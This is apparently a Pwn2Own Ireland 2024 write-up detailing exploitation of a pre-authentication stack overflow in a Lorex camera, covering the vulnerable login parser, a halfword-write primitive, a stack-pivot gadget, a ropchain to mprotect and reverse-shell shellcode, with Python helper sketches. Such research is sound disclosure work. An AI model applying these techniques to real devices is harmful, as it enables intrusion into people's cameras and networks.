Introduction
In October InfoSect participated in Pwn2Own Ireland 2024 and successfully exploited the Sonos Era 300 smart speaker and Lorex 2k Indoor Wifi security camera.
The competition featured a wide variety of targets, including routers, surveillance systems, printers, smart speakers, and other SOHO (small office/home office) devices.
In this blog I will detail exploitation of the pre-authentication stack-based buffer overflow in the Lorex camera found by team member Rami.
Vulnerability
The vulnerability exists in the sonia binary, which handles the majority of the device's services and functions. The pre-authentication login handler of a custom binary protocol (port 35000) contains a stack-based buffer overflow: it copies the user-provided username and password into fixed-size stack buffers without any bounds checks.
The custom protocol handles messages according to dpmessage structures. These contain the message ID and various function callbacks to enable message handling. For the Login message type this structure is:
struct dpmessage Login =
{
    int32_t id = 0x2
    void* probe = Login_probe
    void* parse = Login_parse
    void* package = Login_package
    void* alloc_param = Login_alloc_param
    void* free_param = Login_free_param
    struct dpmessage* next = 0x0
}
The callback Login_parse (0x0038cf08) is called from dpsession_handleInput (0x0034a47c) to parse user-provided input:
int32_t Login_parse(struct dpstack* dpstack, struct LoginReq* req)
{
    ...
    int32_t cmd_bit1 = dpstack->hdr.cmd[1] & 2;
    int32_t zero = cmd_bit1 & 0xff;
    if (cmd_bit1 == 0)
    {
        char username[0x80];
        memset(&username, zero, 0x80);
        char password[0x80];
        memset(&password, zero, 0x80);
        if (dpstack->hdr.len != 0)
        {
            struct ABuffer* buf = dpstack->buf;
            char zero_ = ((int8_t)zero);
            buf->Append(buf, &zero_, 1);    // null-terminate the packet body
            char* data = buf->Data(buf);
            int32_t len = dpstack->hdr.len;
            if (data == 0)
                return -1;
            char* pos_separator = strstr(data, "&&");
            char* pos_null = strchr(data, zero);
            if (((pos_separator == 0 || pos_null == 0) || pos_separator > pos_null))
                return -1;
            memcpy(&username, data, (pos_separator - data));    // [1]
            char* pos_separator2 = strstr(&pos_separator[2], "&&");
            void* password_len;
            if (pos_separator2 == 0)
                password_len = (pos_null - &pos_separator[2]);
            else
                password_len = (pos_separator2 - &pos_separator[2]);
            memcpy(&password, &pos_separator[2], password_len);    // [2]
            if ((len > (pos_null - data) && dpstack_extractParam(&pos_null[1], "Random", &req->random, 0x100) < 0))
            {
                puts("--UserLogin//:error extra data1 ");
                return -1;
            }
        }
        ...
        strncpy(&req->username, &username, 0x1f);
        strncpy(&req->password, &password, 0x7f);
    }
    else
    {
        ...
    }
    return 0;
}
For each request, user data is saved into a dpstack structure containing a header (the first 0x20 bytes of the user packet) and the main content of the packet (stored in an ABuffer structure). In Login_parse, this main content is accessed via the data variable from dpstack->buf->Data(buf). This data is expected to contain a username and password string, separated by a "&&" delimiter, and possibly optional "random" data. At [1] all data up to the first delimiter (username) is copied to a fixed stack buffer of size 0x80, resulting in a potential buffer overflow. At [2] remaining data up to the second delimiter or null byte (password) is copied to a separate fixed stack buffer of size 0x80, resulting in a second potential buffer overflow.
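The length calculations at [1] and [2] can be modelled in a few lines of Python. This is only a sketch of the parsing logic shown above, not code from the device: the function name and the constants are illustrative, and it assumes the packet body has already been separated from the 0x20-byte header.

```python
USERNAME_BUF = 0x80  # size of the username stack buffer in Login_parse
PASSWORD_BUF = 0x80  # size of the password stack buffer in Login_parse


def login_copy_lengths(body: bytes):
    """Return the (username, password) memcpy lengths for a packet body,
    or None when the parser would bail out with -1."""
    data = body + b"\x00"                    # the handler appends a terminator
    pos_null = data.index(b"\x00")           # strchr(data, 0)
    pos_sep = data.find(b"&&", 0, pos_null)  # strstr stops at the first null
    if pos_sep < 0:
        return None
    user_len = pos_sep                       # copy [1]: never compared to 0x80
    start = pos_sep + 2
    pos_sep2 = data.find(b"&&", start, pos_null)
    end = pos_null if pos_sep2 < 0 else pos_sep2
    pass_len = end - start                   # copy [2]: never compared to 0x80
    return user_len, pass_len


def overflows(body: bytes) -> bool:
    """True when either copy would run past its 0x80-byte stack buffer."""
    lengths = login_copy_lengths(body)
    if lengths is None:
        return False
    return lengths[0] > USERNAME_BUF or lengths[1] > PASSWORD_BUF
```

A well-formed body such as b"admin&&secret" yields lengths of 5 and 6, while any username or password longer than 0x80 bytes is copied in full.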
Given the ability to overflow onto the stack, one would imagine exploitation would be extremely straightforward. However, there were a range of constraints that complicated exploitation.
Exploitation environment
For development and testing we would ideally run our target in a debugger to enable detailed dynamic analysis. However, the Lorex camera is highly locked down. First, it is difficult to gain unrestricted shell access to the system. Second, once you do get a shell you find only a bare-bones Busybox Linux system with no useful tools for downloading files, compiling code, or inspecting data (e.g. no wget, nc, curl, bash, xxd, or even dd). Third, once you attempt to run binaries added to the device through an external SD card, you encounter some form of application whitelisting implemented by the modified kernel.
We were able to bypass the application whitelisting using the LD_PRELOAD technique as detailed by Rapid7. This allowed for limited code execution of custom compiled shared objects, which we used to obtain process memory dumps. We were not able to run a standard debugger, which would require compiling or transforming common binaries into shared objects compatible with uClibc.
One of our hardware team members was able to hook up a serial console via UART. This provided a login prompt to a restricted shell, and also exposed a stream of debugging information that ended up being extremely useful. In particular, every time a process crashes there is a dump of the process register state and stack values at the time of the crash. This made it easier to identify the point of failure of an exploit under development. Without this feedback, exploit development would have been significantly hampered.
Exploitation constraints
The sonia binary is not position independent (PIE) and only has partial RELRO, so the placement of the main binary is known without a leak. ASLR was enabled and appeared to suitably randomise the load address of every library.
Without an additional leak, we are quite heavily constrained in achieving a useful effect:
- We know only the load address of the main binary, for which every address contains a high null byte (e.g. 0x0032fd3c).
- Our overflow occurs via memcpy, but the range is calculated using string functions. This means the overflowed data can only contain non-zero bytes, which is the worst of both worlds. Usually you might have the range calculated using strlen and then copied via strcpy, which is advantageous for this scenario because strcpy writes a terminating null byte. Alternatively, you might have an overflow that only uses memcpy, which allows copying all bytes including nulls.
Therefore, at most we can only write one pointer to known memory as part of our overflow, by performing a partial overflow of a value whose high byte is already null. This means a standard ropchain is out of the question, and even adequately hijacking control flow will be difficult as we only get access to one standard gadget.
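The constraint can be expressed as a simple check. The sketch below assumes a little-endian 32-bit target and that the saved value being partially overwritten already has a null high byte, as described above; the function names are illustrative.

```python
import struct


def null_free(payload: bytes) -> bool:
    """True when the bytes survive the strstr/strchr length calculation."""
    return 0 not in payload


def writable_as_final_pointer(addr: int) -> bool:
    """True when addr can be planted by a three-byte partial overwrite.

    The three low bytes are supplied by the overflow and must be non-zero;
    the high byte is never written, so it must already be null in memory.
    """
    raw = struct.pack("<I", addr)
    return raw[3] == 0 and null_free(raw[:3])
```

Under this model 0x0032fd3c is usable as the single trailing pointer, whereas a library or stack address such as 0xb4d27c6f is not, and neither is any main-binary address with a zero in one of its three low bytes.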
Memory state
To better assess our possibilities, we would like a good idea of the memory state of the program: are there any interesting pointers residing in registers, or sitting on the stack at the point of the overflow or subsequent function return? The vulnerable function Login_parse has two main return paths after the overflow occurs, depending on whether a subsequent parsing error occurs. The possible register states on returning from the vulnerable function are:
return -1
    r11:   GOT address
    r10:   .data pointer to "cmd 0x%02x dataLen %d, cost time %llu"
    r4-r9: clobbered/controlled by the overflow
    r3:    0x1
    r2:    0x1
    r1:    0x0
    r0:    -0x1

return 0
    r11:   GOT address
    r10:   .data pointer to "cmd 0x%02x dataLen %d, cost time %llu"
    r4-r9: clobbered/controlled by the overflow
    r3:    0xae321a: this is a heap pointer to the end of the strncpy dst pointer (req->password)
    r2:    0x0
    r1:    0xb4d27c6f == SP-0x21: this is offset 0x7f into the password string stored on the stack, which is the updated src pointer to the strncpy call
    r0:    0x0
Unfortunately we only have immediate access to two useful pointers when returning without error. One is a pointer to the password stack buffer at offset 0x7f (the final source pointer of the last strncpy) and the other is a heap pointer to the destination heap chunk. But both of these regions only contain string data without nulls, so we cannot store further ROP pointers here.
Failed strategies
A range of strategies were attempted and eventually discarded. These included:
- Standard ropchain
  - We can only write one pointer via a partial overflow. Control of registers r4-r8 would only allow possibly one further bx rn gadget.
- Pivot back into a ropchain stored in user input
  - We lose the pointer to our raw input in r7, and retrieving it requires multiple dereferences of a session pointer. There is always the possibility of returning to user input that has been stored in .bss through a separate application request, although we would need additional reversing to find these possibilities.
- Partial overwrite of a register saved on the stack, rather than hijacking control flow
  - The only useful values we can overwrite are heap pointers, which have non-null high bytes. There is potential to partially overwrite one of these saved heap pointers to redirect it to a nearby fake heap object, but we would ideally prefer a more straightforward path.
- One-shot return to useful function call in program
  - With a one-shot attempt we must ensure we create a significant effect. With the locked down nature of the system, lack of useful programs, and the small payload size, I could not find anything useful to do with a one-shot system call. In other circumstances we might be able to enable a telnetd instance or change a password to an existing service. Unfortunately our useful pointer in r1 is too close to the top of the stack frame, meaning that any subsequent function call will clobber our user data. Given the immense size of the sonia binary, there are likely to be novel one-shot locations specific to the application, which might be found through additional reversing.
- Stack pivot + program restart
  - This requires a very specialised gadget to pivot and then return to an appropriate location. It also requires finding a location that can successfully restart the program, noting that it will be called from just one of many active threads.
We then considered the idea of incremental exploitation: finding ways to perform a small effect while preserving the application state/availability to enable further effects.
Incremental exploitation
The underlying motivation for this idea is the technique of returning to a higher stack frame after exploitation to not only prevent an application crash but maintain service availability (for example, after hijacking code execution and executing a system call). Instead of using this as a post-exploitation technique, can we turn this into part of the exploitation?
The key idea is that we can effectively use anything in the program as a gadget as long as it allows us to successfully return into a higher function in the call stack below the main service handler. This means avoiding the use of any of the clobbered registers, but allows us to re-use program code that may not otherwise be thought of as a gadget. Then, all we need to find is a target location with a minor effect (such as a small arbitrary write) that can then be repeated.
The call stack for our vulnerable function is as follows:
- _AedaServiceContainer_ThreadProc_1ab5f4
- call_AedaService_Handle_1ab5a4
- AedaService_Handle_1a2304
- netmux_rectifier_on_event
- lock_callr3_19ecd6
- _netmux_rectifier_on_event_refence_helper
- dpsession_onNetMuxRecv
- dpsession_handleInput
- Login_parse
By considering/combining the effects of these functions on the stack pointer, and the use of saved registers in the stack, we can derive the following 'effective' epilogues for a pseudo gadget that would allow us to restore saved registers from the stack and return to one of these callers:
add sp, #0x1fc ; pop {r4-r11, pc}
add sp, #0x198 ; pop {r3-r7, pc}
add sp, #0x174 ; pop {r4-r11, pc}
add sp, #0x134 ; pop {r4-r7, pc}
add sp, #0xf0 ; pop {r3-r7, pc}
add sp, #0xdc ; pop {r4-r7, pc}
add sp, #0x84 ; pop {r4-r11, pc}
add sp, #0x28 ; pop {r4-r8, pc}
There is some flexibility in these effective epilogues if the return points in these functions don't critically rely on values in the lowest saved registers (for example, we might be able to use add sp, #0x88; pop {r5-r11, pc} in addition to add sp, #0x84; pop {r4-r11, pc}).
For context, given the large size of the sonia binary there were many functions sharing the above epilogues, with many potential return points to consider per function. For example, there were 71 functions sharing the add sp, #0x28 ; pop {r4-r8, pc} epilogue.
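The effective epilogues listed above are cumulative, which can be checked with a little arithmetic. The sketch below assumes that each effective adjustment equals everything consumed by the frames beneath it (their adjustment plus four bytes per popped register) plus that frame's own add sp value. The per-frame values it prints are derived purely from the numbers listed above, not read from the binary.

```python
import re

# The effective epilogues from the list above, reordered innermost frame first.
EFFECTIVE_EPILOGUES = [
    "add sp, #0x28 ; pop {r4-r8, pc}",
    "add sp, #0x84 ; pop {r4-r11, pc}",
    "add sp, #0xdc ; pop {r4-r7, pc}",
    "add sp, #0xf0 ; pop {r3-r7, pc}",
    "add sp, #0x134 ; pop {r4-r7, pc}",
    "add sp, #0x174 ; pop {r4-r11, pc}",
    "add sp, #0x198 ; pop {r3-r7, pc}",
    "add sp, #0x1fc ; pop {r4-r11, pc}",
]


def popped_words(reglist: str) -> int:
    """Count the registers in a list such as 'r4-r11, pc'."""
    count = 0
    for item in reglist.split(","):
        item = item.strip()
        if "-" in item:
            low, high = item.split("-")
            count += int(high[1:]) - int(low[1:]) + 1
        else:
            count += 1
    return count


def per_frame_adjustments(epilogues):
    """Recover each frame's own 'add sp' value from the cumulative ones."""
    own = []
    consumed = 0  # bytes of stack used by all frames beneath the current one
    for text in epilogues:
        match = re.fullmatch(r"add sp, #(0x[0-9a-f]+) ; pop \{(.+)\}", text)
        total = int(match.group(1), 16)
        own.append(total - consumed)
        consumed = total + 4 * popped_words(match.group(2))
    return own


print([hex(value) for value in per_frame_adjustments(EFFECTIVE_EPILOGUES)])
# ['0x28', '0x44', '0x34', '0x0', '0x2c', '0x2c', '0x0', '0x4c']
```

Every derived value is non-negative and word-aligned, which is what we would expect if the listed epilogues are stacked consistently. A candidate target function is only usable if its own epilogue matches one of the cumulative forms.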
Hope
While considering the available options I thought I had a viable strategy to return to a location that uses our user data pointer in r1 as the format argument to vsnprintf. This would allow us to repeatedly use format string payloads to perform a sequence of arbitrary writes. For example, we can jump into the middle of the code setting up arguments for a call to logging function 0x1a6900 at 0x104aa8. This writes r1 (our source pointer from the password saved on the stack) to param6, which will then be used as the format argument to vsnprintf. Unfortunately, because our pointer sits near the top of the stack, the act of calling any function clobbers our intended data.
Continuing on, as I reached the end of all possible return locations I realised I would have to try harder to find a useful instruction. I began considering the potential for uncovering unexpected instructions by returning to the middle of a 4 byte instruction. This is a common strategy for x86 - being a variable length CISC instruction set - and any gadget finder will find these for you. This has less potential for ARM, as instructions are aligned and have fixed widths of either 2 or 4 bytes. However given the variability in instruction size, we can jump 2 bytes into a 4 byte instruction to uncover a new unintended instruction.
After considering a number of other locations, at address 0x26468 I disassembled the beautiful instruction STRH r7, [r6, r7]. This stores a halfword from register r7 to the memory address r6+r7. By overflowing the addition of the r6 and r7 registers we can derive a target address containing a high null byte. This is exactly what we need, as it allows for an almost arbitrary write using registers we control. As this sits within a function with the epilogue add sp, #0x174 ; pop {r4-r11, pc}, we can successfully return to call_AedaService_Handle_1ab5a4 to recover gracefully after having hijacked control flow, thereby enabling repeated arbitrary writes (noting that there are some constraints and we cannot write null bytes).
Here is a comparison of the intended instruction against the intermediate instruction:
Also note that we can gracefully pass through the subsequent function call to audlog.
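Choosing register values for the STRH r7, [r6, r7] primitive comes down to modular arithmetic. The following is a sketch under two assumptions: both registers are restored from overflowed stack data, so none of their bytes may be null, and the target address used in the usage note is a hypothetical placeholder rather than a real location in sonia.

```python
MASK = 0xFFFFFFFF


def null_free(value: int) -> bool:
    """True when none of the four bytes of a 32-bit value is zero."""
    return all((value >> shift) & 0xFF for shift in (0, 8, 16, 24))


def strh_registers(target: int, halfword: int):
    """Find (r6, r7) so that STRH r7, [r6, r7] stores halfword at target.

    The low 16 bits of r7 are the data; its high 16 bits are free filler.
    r6 is chosen so that r6 + r7 wraps around 2**32 onto the target address.
    """
    if not 0 < halfword <= 0xFFFF or not (halfword & 0xFF and halfword >> 8):
        raise ValueError("the halfword must consist of two non-zero bytes")
    for filler in range(0x0101, 0x10000):
        r7 = (filler << 16) | halfword
        r6 = (target - r7) & MASK
        if null_free(r7) and null_free(r6):
            return r6, r7
    raise ValueError("no null-free register pair found for this write")
```

For a hypothetical target of 0x00a01234 and the halfword 0x4142, this returns r6 = 0xff9ed0f2 and r7 = 0x01014142, whose sum wraps to the target.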
Next steps
With a repeatable arbitrary write the sky is the limit. I first considered lower impact options such as rewriting GOT entries, but eventually settled on a 'standard' exploitation strategy as follows:
- Find a stack pivot to unlock a traditional ropchain
- Develop a ropchain to make memory executable and jump to shellcode
- Develop shellcode to achieve a reverse shell
- Write the stack pivot data, ropchain and shellcode to a known location in .bss and employ the stack pivot
For reference, rewriting GOT entries was discarded because I could only find very standard functions to replace, and doing so would have consequences for the many other threads/services the sonia binary was handling.
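Staging a payload in .bss through the halfword primitive needs some planning, because null bytes cannot be written. The planner below is only a sketch. It assumes the destination memory is initially zero, so null bytes in the payload can simply be skipped, and that halfword stores to odd addresses are permitted on the target. Both are assumptions, not facts taken from the device.

```python
def plan_halfword_writes(base: int, blob: bytes):
    """Return (address, halfword) pairs that reproduce blob in zeroed memory."""
    writes = []
    i = 0
    while i < len(blob):
        if blob[i] == 0:
            i += 1                      # rely on the memory already being zero
            continue
        j = i
        while j < len(blob) and blob[j] != 0:
            j += 1
        run = blob[i:j]                 # maximal run of non-zero bytes
        if len(run) == 1:
            raise ValueError(f"isolated non-null byte at offset {i:#x}")
        k = 0
        while k < len(run):
            if k + 2 > len(run):
                k = len(run) - 2        # odd run: overlap the last write
            value = int.from_bytes(run[k:k + 2], "little")
            writes.append((base + i + k, value))
            k += 2
        i = j
    return writes


def apply_writes(base: int, size: int, writes):
    """Replay the planned writes against a zero-filled buffer."""
    memory = bytearray(size)
    for address, value in writes:
        offset = address - base
        memory[offset:offset + 2] = value.to_bytes(2, "little")
    return bytes(memory)
```

The ValueError branch corresponds to the one case this primitive cannot express: a single non-null byte with null bytes on both sides, since any halfword covering it would also have to write one of its null neighbours.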
Stack pivot
Finding a usable stack pivot proved a challenge, though not as hard as finding the write primitive. As the program executes primarily in THUMB mode without using a frame pointer, I could not find any stack pivots in the 128k THUMB gadgets available. However, given the architecture we are lucky to also be able to consider gadgets by interpreting memory in ARM rather than THUMB mode (which is controlled by the low bit of the instruction address). This unlocks an additional 29k ARM gadgets, many with the form ldm rn, {..., sp, pc}. After reviewing 100 or so matches for the regex r[4-9], r[4-9].+ldm.+\{.+sp,.+\} I found a suitable gadget:
rsbseq r0, r8, r4, asr ip ; movwhs lr, #0x9d1 ; ldmib r0, {r4, r5, r8, sl, ip, sp, pc}.
This calculates a pointer into r0 as r0 = (r4 >> ip.lo) - r8. Given our value of ip, we can effectively set this calculation to r0 = 0 - r8, letting us derive a pointer with a high null byte (a known area of .bss) from which to load a new stack pointer.
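The pointer calculation in this gadget can be modelled as follows. This is a sketch assuming standard ARM semantics for a register-specified ASR (the shift amount is the low byte of ip, and a shift of 32 or more leaves only copies of the sign bit) and assuming r4 holds a non-negative value. The .bss address in the usage note is a hypothetical placeholder.

```python
MASK = 0xFFFFFFFF


def asr32(value: int, amount: int) -> int:
    """Model 'asr' by a register amount on a 32-bit value."""
    amount &= 0xFF                       # only the low byte of ip is used
    signed = value - (1 << 32) if value & 0x80000000 else value
    if amount >= 32:
        return MASK if signed < 0 else 0  # nothing left but sign bits
    return (signed >> amount) & MASK


def pivot_r0(r4: int, r8: int, ip: int) -> int:
    """r0 as computed by 'rsbs r0, r8, r4, asr ip'."""
    return (asr32(r4, ip) - r8) & MASK


def r8_for_target(target: int) -> int:
    """Pick r8 so that 0 - r8 wraps around to the desired r0."""
    return (-target) & MASK


# ldmib increments before each load, so with r0 as the base the register list
# {r4, r5, r8, sl, ip, sp, pc} is read from r0+0x4 up to r0+0x1c:
# the new sp comes from r0+0x18 and the new pc from r0+0x1c.
```

For a hypothetical target of 0x00a04321, r8 becomes 0xff5fbcdf, which contains no null bytes and can therefore be delivered through the overflow.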
ROPchain
The ropchain is pretty standard. Because sonia itself does not import mprotect, I load the resolved GOT entry for mmap and then add the fixed offset between the two functions to derive the location of mprotect in libc.
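The address derivation amounts to a single subtraction and addition, which the ropchain performs with gadgets at run time. The sketch below shows the arithmetic only. All addresses and offsets in the usage note are made-up placeholders, not values from the device's uClibc.

```python
def resolve_from_leak(leaked_addr: int, leaked_offset: int, wanted_offset: int) -> int:
    """Derive one library symbol's run-time address from another's.

    leaked_addr   -- run-time address read from the GOT (here: mmap)
    leaked_offset -- offset of that symbol inside the library file
    wanted_offset -- offset of the symbol we actually want (here: mprotect)
    """
    library_base = leaked_addr - leaked_offset
    return (library_base + wanted_offset) & 0xFFFFFFFF
```

With a placeholder leak of 0xb6f12340 for a symbol at library offset 0x12340, a second symbol at offset 0x12400 resolves to 0xb6f12400. Because the difference between the two offsets is constant for a given library build, the chain only needs to add that one constant to the value loaded from the GOT, which is also why the exploit depends on the exact libc version.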
Shellcode
The shellcode was a bit of a pain because the most basic reverse shell (connect+dup+execve) immediately caused a kernel oops. I was unsure why this was, but suspected we might need to provide valid argv and envp pointers to execve. However, this still resulted in a kernel oops. After reviewing the uses of execve within sonia, I added a fork before the execve and was then able to cleanly open a reverse shell.
The Experience
Attending the competition in person was a blast, although it was not without high stress and drama. When competing in Pwn2Own there are three big worries from the moment you have a bug:
- Vendors might release a new firmware version days before the competition that patches your bug.
- Vendors might release a new firmware version days before the competition that requires you to completely redevelop your exploit.
- The device you have developed your exploit for might somehow not match the device used in the competition.
InfoSect received the full Pwn2Own experience, with each of these occurring across the 3 devices we were targeting. For the Lorex, we received the firmware version of the target devices 2 days before the competition. The competition device was running firmware version 2.800.020000000.3.R.20220331, but our device was running firmware version 2.800.030000000.3.R.20220331! Given the build date, it seemed likely that our device was not running updated firmware, but rather an alternate build (possibly for a slightly different model, vendor, or region).
For two days I was anxious that the exploit would fail because it relied on hardcoded offsets for both sonia and uClibc. We tried to source local devices, but none were available. A day before our exploit attempt we obtained the version 2 sonia binary from a very kind competitor. This gave us very good news: the binary was almost identical to version 3, and differed only in a few strings regarding PAL vs NTSC video standards.
On the day of our attempt we were hopeful our exploit would succeed, but it was still untested against a version 2 device, and we weren't completely certain that this version used an identical uClibc. In the 30 minutes leading up to our exploit attempt I was still trying to rewrite my ropchain to execute an mprotect system call instead of a library call, but was hampered by the minor constraints of the 'arbitrary' write (the inability to write a single non-null byte surrounded by null bytes).
I tried to maintain my composure when the attempt began, taking care to ensure everything was set up correctly before firing the exploit. We then waited with bated breath for one minute while the exploit performed the 80+ writes. Then there was relief when we got our shell!
Conclusion
All in all, it was an amazing experience to participate in Pwn2Own, and the event was very well run. Some lessons learned for future events:
- There are many factors outside your control. Expect things to go wrong.
- Try to have backup bugs/exploits so you can respond to last minute changes.
- It can be a stressful experience, even when you know you have a completely reliable and stable exploit.
- Buy your devices from the same region as the ZDI purchasing office!
Huge respect to all competitors and hope to see you in future.